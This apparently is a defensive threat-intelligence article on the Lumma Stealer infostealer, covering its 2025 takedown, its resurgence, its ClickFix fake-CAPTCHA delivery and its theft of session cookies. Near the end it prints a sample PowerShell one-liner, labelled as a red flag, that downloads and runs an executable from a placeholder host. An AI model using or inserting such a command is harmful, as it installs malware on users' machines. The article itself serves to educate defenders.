Lumma Stealer was supposed to be dead. In May 2025, Microsoft’s Digital Crimes Unit, the U.S. Department of Justice, Europol, and Japan’s JC3 ran one of the largest infostealer takedowns on record, seizing roughly 2,300 domains and severing the command-and-control backbone that thousands of criminals relied on. Within weeks, it was back. By mid-2026, Lumma Stealer is once again among the most active credential-harvesting tools in the world, and its rapid recovery has become a case study in why malware-as-a-service is so hard to kill.

This analysis breaks down what the takedown actually accomplished, how the operation rebuilt, the hard numbers behind the campaign, and what the resurgence means for defenders watching credential theft fuel ransomware in 2026.

What Lumma Stealer Is and Why It Matters in 2026

Lumma Stealer, also tracked as LummaC2, is an information-stealing malware sold as a subscription service on underground forums. It does one job well. It lands on a Windows machine, scrapes everything of value, and exfiltrates it to attacker infrastructure in seconds. Microsoft describes it as “the favored info-stealing malware used by hundreds of cyber threat actors,” a line from the company’s own takedown announcement that captures why this single family draws so much attention.

The targets are predictable and lucrative: saved browser passwords, autofill data, credit card numbers, banking session details, and cryptocurrency wallet files. Crucially, Lumma also harvests session cookies and authentication tokens. Those tokens let an attacker replay an already-authenticated session, which means a stolen cookie can sidestep multi-factor authentication entirely. The victim did everything right, enabled MFA, and still loses the account because the attacker walks in through a valid session rather than the front door.

Lumma Stealer matters in 2026 because it sits at the front of the ransomware kill chain. Stolen credentials and session data from infostealer logs are now a primary initial-access method. Security researchers tracking this pattern found that a majority of ransomware victims had corporate domain credentials surface in stealer-log marketplaces before the ransomware ever hit. Lumma is one of the engines feeding that pipeline, which is why a single piece of commodity malware became the focus of a multinational legal operation.

The May 2025 Takedown: 2,300 Domains in One Strike

On May 13, 2025, Microsoft’s Digital Crimes Unit (DCU) filed suit in the U.S. District Court for the Northern District of Georgia. The court order authorized Microsoft to seize, suspend, or block the domains that formed the spine of Lumma’s network. Eight days later, on May 21, Microsoft and its partners went public with the full scope of the operation.

The numbers were significant. Microsoft seized, suspended, or blocked approximately 2,300 malicious domains. More than 1,300 of those domains were redirected to Microsoft-controlled sinkholes, which let investigators watch infected machines try to phone home and quietly cut them off from their operators. In parallel, the Department of Justice seized Lumma’s central command structure and disrupted the online marketplaces where the malware and its stolen logs were sold. Europol’s European Cybercrime Centre and Japan’s JC3 coordinated suspensions of infrastructure hosted in their regions.

Steven Masada, Assistant General Counsel in Microsoft’s DCU, laid out the legal mechanics plainly: “Via a court order granted in the United States District Court of the Northern District of Georgia, Microsoft’s DCU seized and facilitated the takedown, suspension, and blocking of approximately 2,300 malicious domains that formed the backbone of Lumma’s infrastructure.”

To measure the footprint they were dismantling, Microsoft scanned for active infections. Between March 16 and May 16, 2025, the company identified more than 394,000 Windows computers worldwide infected by Lumma. That is a 60-day snapshot, not a lifetime total, which makes it a conservative floor rather than a ceiling. Victims spanned schools, banks, hospitals, and critical services across multiple countries.

Takedown by the Numbers

The table below consolidates the verified figures from the May 2025 operation and the surrounding telemetry that researchers published through 2025 and into 2026.

MetricFigureSource / Period
Malicious domains seized, suspended, or blocked~2,300Microsoft DCU, May 2025
Domains redirected to sinkholes1,300+Microsoft DCU, May 2025
Infected Windows devices identified394,000+Microsoft, Mar 16 to May 16, 2025
Court jurisdictionN. District of GeorgiaU.S. District Court, May 13, 2025
Agencies coordinatingMicrosoft, DOJ, Europol, JC3May 2025
Resurgence detectedWithin weeksTrend Micro, June to July 2025
Credentials stolen by infostealers, H1 20251.8 billionIndustry threat reporting, 2025
Infected devices behind H1 2025 totals5.8 millionIndustry threat reporting, 2025

One caveat worth stating directly. Microsoft’s 394,000 figure covers a two-month window. Secondary reporting tied to the case cited far larger cumulative numbers, including roughly 10 million infections attributed to Lumma over its operational life and at least 1.7 million instances where it was used to steal information. Those higher figures come from law-enforcement attribution rather than Microsoft’s own scan, so treat them as the broader historical estimate and the 394,000 as the audited two-month count.

Back to Business: How Fast Lumma Recovered

The disruption bought defenders weeks, not months. Trend Micro, which tracked the operation closely, reported that Lumma “has re-emerged shortly after its takedown” and that the group behind it returned intent on employing more covert tactics. Its telemetry showed the recovery curve clearly: from June to July 2025, the number of targeted accounts began resurging, climbing back toward pre-takedown levels.

By February 2026, Bitdefender confirmed Lumma had rebuilt its infrastructure and was spreading worldwide again. The operators did not need to reinvent the malware. They needed new domains, new hosting, and a fresh set of distribution channels, all of which are cheap and abundant. The code itself, the exfiltration logic, and the affiliate base survived the legal strike intact.

This is the core lesson of the Lumma Stealer case. A takedown that removes 2,300 domains and a command server inflicts real cost, but it attacks the perimeter of a service, not its center of gravity. The center of gravity is the developer team, the affiliate network, and the demand from buyers, none of which a domain seizure touches. As long as that demand exists, rebuilding is a logistics problem, and these operators are good at logistics.

The ClickFix and Fake CAPTCHA Distribution Machine

Lumma’s signature delivery method is a social-engineering trick known as ClickFix, built around fake CAPTCHA and “human verification” pages. It is effective because it weaponizes a habit users have been trained to follow without thinking: prove you are human.

How the ClickFix Lure Works

A victim lands on a compromised or malicious site and sees what looks like a routine verification box. Instead of clicking a checkbox, the page instructs them to complete a few steps: press the Windows key and R, paste a command the page has already copied to their clipboard, then press Enter. That sequence opens the Windows Run dialog and executes a PowerShell command. PowerShell then quietly downloads and runs the Lumma payload from attacker infrastructure.

The danger is that the victim runs the malware themselves. There is no malicious attachment to scan, no drive-by download for a browser to block. File-based defenses see a user voluntarily opening a system dialog and typing a command. SentinelOne researchers describe this as weaponizing “verification fatigue,” the reflexive compliance people show toward CAPTCHA-style prompts after years of clicking them.

The Scale of the Lure

The reach of these campaigns is substantial. Kaspersky’s Securelist team documented one malvertising wave in which, between September 22 and October 14, 2024, more than 140,000 users encountered the malicious ad scripts and over 20,000 were redirected to infected sites serving fake CAPTCHA pages and bogus update notifications. Lumma also rides cracked software downloads, malicious search ads, and compromised legitimate websites, spreading the same ClickFix pattern across many entry points.

For defenders, the takeaway is that endpoint and email filtering are not enough on their own. The decisive control here is user awareness plus restricting or monitoring how the Run dialog and PowerShell get invoked, because the attack chain depends on a human action that traditional malware delivery never required.

Malware-as-a-Service: The Business Model Behind Lumma

Lumma Stealer is not a tool a lone hacker built and hoards. It is a product. It runs on a subscription model where the developers handle the malware, the control panel, and the stolen-log logistics, while paying affiliates handle distribution and keep a cut. This division of labor is exactly what makes infostealers so resilient and so widespread.

The economics are brutal for defenders. Infostealer subscriptions have been documented at roughly $200 per month on average across the malware-as-a-service market in recent reporting, with tiered plans that scale up for buyers who want more capability or higher-value targets. At that price, the barrier to entry is a rounding error against the potential payout from a single corporate credential set that opens the door to ransomware. A four-figure malware subscription that yields a million-dollar ransom is the math driving the entire category.

That low cost, high reward ratio explains why takedowns alone cannot win. Every disruption raises the operators’ costs temporarily, but the underlying demand from hundreds of affiliate buyers stays constant. When Microsoft seized Lumma’s domains, it did not change the calculus for the thousands of criminals who still wanted exactly what Lumma sells. They waited a few weeks and came back.

Lumma vs. StealC, Vidar, RedLine, and ACRStealer

Lumma does not operate in a vacuum. The infostealer market is crowded, competitive, and quick to reshuffle whenever one family gets disrupted. As of early 2026, threat intelligence tracking active distribution put four families at the top of the pile: LummaC2, ACRStealer, StealC, and Vidar. RedLine, once a dominant name, was knocked down hard by the international Operation Magnus in late 2024, and rivals moved to absorb the displaced demand.

The pattern across this market is musical chairs. When law enforcement removes one stealer, affiliates migrate to whichever competitor offers the best uptime, evasion, and price. That mobility is why no single takedown dents the overall volume of stolen credentials for long. The table below summarizes the competitive landscape as reported through 2025 and into 2026.

Stealer familyStatus in 2026Notable traitPrimary delivery
LummaC2 (Lumma)Active, rebuilt after May 2025 takedownMaaS scale, hundreds of affiliatesFake CAPTCHA / ClickFix, malvertising
ACRStealerActive, top-three distribution in early 2026Rapid growth filling the RedLine gapCracked software, malvertising
StealCActive, top-four familyFrequent feature updatesLoaders, phishing
VidarActive, long-running familyVeteran codebase, steady demandCracked software, phishing
RedLineDisrupted by Operation Magnus, late 2024Former market leader, displacedPhishing, malvertising (historical)

The competitive dynamic cuts both ways for Lumma. Its quick recovery let it hold market position, but ACRStealer’s surge shows how fast a rival can capitalize when a leader stumbles. For buyers, this is a healthy market with multiple suppliers. For everyone else, it is a resilient ecosystem where supply reliably meets demand.

Why Stolen Session Cookies Beat Your MFA

The single most important technical capability in Lumma’s toolkit is session cookie theft. Multi-factor authentication has rightly become the baseline defense for account security, and it stops the overwhelming majority of password-only attacks. Infostealers route around it.

When you log in to a service and complete an MFA challenge, the server hands your browser a session token, a cookie that says “this user already proved who they are, let them through.” That cookie can stay valid for hours, days, or weeks. Lumma grabs it straight from the browser’s storage. An attacker who imports that cookie into their own browser inherits your authenticated session without ever seeing your password or your one-time code. The MFA challenge already happened, and the attacker is reusing its result.

This is why a credential-theft story is also an MFA-bypass story. The defenses that blunt cookie theft are different from the ones that stop password reuse: shorter session lifetimes, binding tokens to a device or IP, re-authentication for sensitive actions, and phishing-resistant methods like passkeys that do not leave a long-lived reusable secret sitting in browser storage. Organizations that treat MFA as a finished project, rather than one layer, are exactly the ones Lumma is built to beat.

Historical Context: From RedLine to Lumma’s Reign

Infostealers are not new, but their role has changed. A few years ago they were treated as commodity nuisance malware, the kind that lifted gaming logins and a few saved passwords. The shift came when criminals realized that the same stolen browser data, especially corporate credentials and session cookies, was the cleanest possible on-ramp to enterprise networks.

RedLine dominated the early wave and became shorthand for the category until Operation Magnus disrupted it in late 2024. Lumma, which had been growing as a MaaS offering since 2022, was well positioned to absorb the displaced affiliates. By 2025 it was the favored stealer for hundreds of actors, which is precisely why Microsoft and the DOJ targeted it. The 2024 to 2026 arc shows a market that does not collapse when its leader falls. It promotes the next contender.

The aggregate numbers underline how the category scaled. In 2024, infostealers were used to steal an estimated 2.1 billion credentials, over 60 percent of the roughly 3.2 billion credentials stolen from organizations that year. By the first half of 2025, infostealers had harvested 1.8 billion credentials from 5.8 million infected devices in just six months. Lumma’s takedown and recovery played out against that backdrop of relentless, rising volume.

Market Impact: What the Resurgence Costs Defenders

The practical impact of Lumma’s return is measured in incident response hours and ransomware payouts. Because infostealer logs feed initial access, every active Lumma campaign is a feeder system for the more destructive attacks that follow. Researchers found that 54 percent of ransomware victims had domain credentials appear in stealer-log marketplaces before the ransomware struck. That correlation makes infostealer activity a leading indicator, not a separate problem.

For security teams, the resurgence shifts the cost-benefit math on monitoring. Dark web and stealer-log monitoring, once a nice-to-have, becomes a frontline control because spotting your own credentials in a fresh Lumma log can be the only warning before a ransomware actor buys them. For the broader market, persistent infostealer activity sustains demand for endpoint detection, identity threat detection, and the passwordless and session-hardening products that directly counter cookie theft.

There is also a clear cost to the takedown model itself. The Lumma operation was expensive, multinational, and legally complex, and it bought a few weeks. That does not make takedowns pointless, but it reframes them as one tool among many rather than a solution. The durable wins come from raising the cost of doing business for operators and shrinking the value of what they steal, both of which are slower and less satisfying than a domain seizure but harder to reverse.

What Experts Are Saying About Lumma Stealer

The expert consensus around Lumma is unusually aligned: the takedown mattered, and it was never going to be permanent.

Microsoft’s Steven Masada framed the original disruption in terms of scale and importance, calling Lumma “the favored info-stealing malware used by hundreds of cyber threat actors” and detailing the seizure of “approximately 2,300 malicious domains that formed the backbone of Lumma’s infrastructure.”

Trend Micro’s threat researchers were among the first to document the rebound, noting that Lumma “has re-emerged shortly after its takedown” with operators intent on employing more covert tactics, and that targeted accounts began resurging from June to July 2025.

Bitdefender’s analysis emphasized the mechanics of why the takedown hurt at all: by severing the domains, the operation prevented Lumma from receiving instructions and exfiltrating stolen data, which is exactly the function the operators raced to rebuild. By February 2026, Bitdefender confirmed that rebuild was complete and the malware was again spreading worldwide. SentinelOne’s researchers, focused on delivery, summarized the ClickFix trend as weaponizing verification fatigue, capturing why the fake CAPTCHA lure keeps working even against users who consider themselves careful.

Five Predictions for Infostealers Through 2026 and 2027

Based on the trajectory of the Lumma Stealer case and the broader market, here is where the evidence points.

  • Takedowns will keep coming, and so will the rebounds. Expect at least one more major infostealer disruption in 2026, and expect the disrupted family, or a near-clone, to be operational again within one to three months, following the Lumma and RedLine pattern.
  • Session cookie theft becomes the headline capability. As passkeys and stronger MFA spread, attackers lean harder on stealing live sessions. Cookie theft, not password theft, will define the next wave of account takeovers.
  • ClickFix-style lures expand beyond CAPTCHA. The “make the victim run the command” pattern is too effective to stay tied to fake verification pages. Expect it to spread into fake software updates, fake support flows, and AI-tool impersonation.
  • The market consolidates around three to four MaaS leaders. LummaC2, ACRStealer, StealC, and Vidar will keep trading position, with affiliates migrating fluidly after each disruption rather than the category shrinking.
  • Stealer-log monitoring becomes a standard control. Treating leaked credentials as a leading indicator of ransomware moves from advanced security teams to mainstream practice, because the 54 percent correlation is too strong to ignore.

How to Defend Against Lumma Stealer

Lumma’s strengths point straight at the defenses that work. Because the attack depends on a user running a PowerShell command, user awareness is a genuine control here, not a checkbox. Teach people that no legitimate CAPTCHA ever asks them to press Windows+R and paste a command. That single piece of knowledge breaks the entire ClickFix chain.

Technically, the priorities are restricting or logging script execution, shortening session lifetimes so stolen cookies expire faster, moving high-value accounts to phishing-resistant passkeys, and monitoring stealer-log marketplaces for your own domains. Endpoint detection still matters for catching the payload, but the decisive layer is denying value to what Lumma steals: a cookie that expired is worthless, and a passkey login leaves no reusable secret to lift.

For individuals, the basics hold. Avoid cracked software, the single most common Lumma delivery vector. Use a password manager so credentials are not sitting in plaintext browser storage. Turn on MFA everywhere, knowing it is necessary but not sufficient against cookie theft, and stay skeptical of any “verification” step that wants you to run a command. The example below shows the kind of ClickFix command a fake CAPTCHA page tries to get you to paste into the Run dialog. If you ever see something like it, close the tab.

# RED FLAG: no real "human verification" ever asks you to run this
powershell -w hidden -nop -c "iwr https://malicious[.]example/x -OutFile $env:TEMP\a.exe; start $env:TEMP\a.exe"
# Windows+R, paste, Enter = you just installed the infostealer yourself

Frequently Asked Questions

Is Lumma Stealer still active in 2026?

Yes. Despite the May 2025 takedown that seized roughly 2,300 domains, Lumma rebuilt within weeks. Trend Micro tracked its resurgence from June to July 2025, and Bitdefender confirmed in February 2026 that it had rebuilt its infrastructure and was spreading worldwide again.

How does Lumma Stealer infect computers?

Its signature method is ClickFix: fake CAPTCHA or “human verification” pages that instruct the victim to press Windows+R, paste a pre-copied command, and hit Enter. That runs a PowerShell command which downloads the malware. It also spreads through cracked software, malicious ads, and compromised websites.

Can Lumma Stealer bypass multi-factor authentication?

Indirectly, yes. Lumma steals session cookies and authentication tokens from the browser. An attacker who reuses a valid session cookie inherits an already-authenticated session, so the MFA challenge the victim already passed is effectively reused. Phishing-resistant passkeys and short session lifetimes reduce this risk.

How many devices did Lumma Stealer infect?

Microsoft identified more than 394,000 infected Windows devices worldwide in a single 60-day window from March 16 to May 16, 2025. Broader law-enforcement attribution cited in case coverage put cumulative infections far higher, on the order of millions, over the malware’s operational life.

What data does Lumma Stealer steal?

Saved browser passwords and autofill data, credit card details, banking information, cryptocurrency wallet files, and session cookies and authentication tokens. The cookies and tokens are the most dangerous because they enable session reuse that can bypass MFA.

Who took down Lumma Stealer?

Microsoft’s Digital Crimes Unit led the operation under a court order from the U.S. District Court for the Northern District of Georgia, coordinating with the U.S. Department of Justice, Europol’s European Cybercrime Centre, and Japan’s JC3. The DOJ separately seized Lumma’s central command structure.

Why did the takedown fail to stop Lumma permanently?

A domain seizure removes infrastructure but not the developers, the affiliate network, or the buyer demand that sustains a malware-as-a-service operation. With the code and the affiliate base intact, rebuilding was a logistics task the operators completed in weeks.

Sources and Further Reading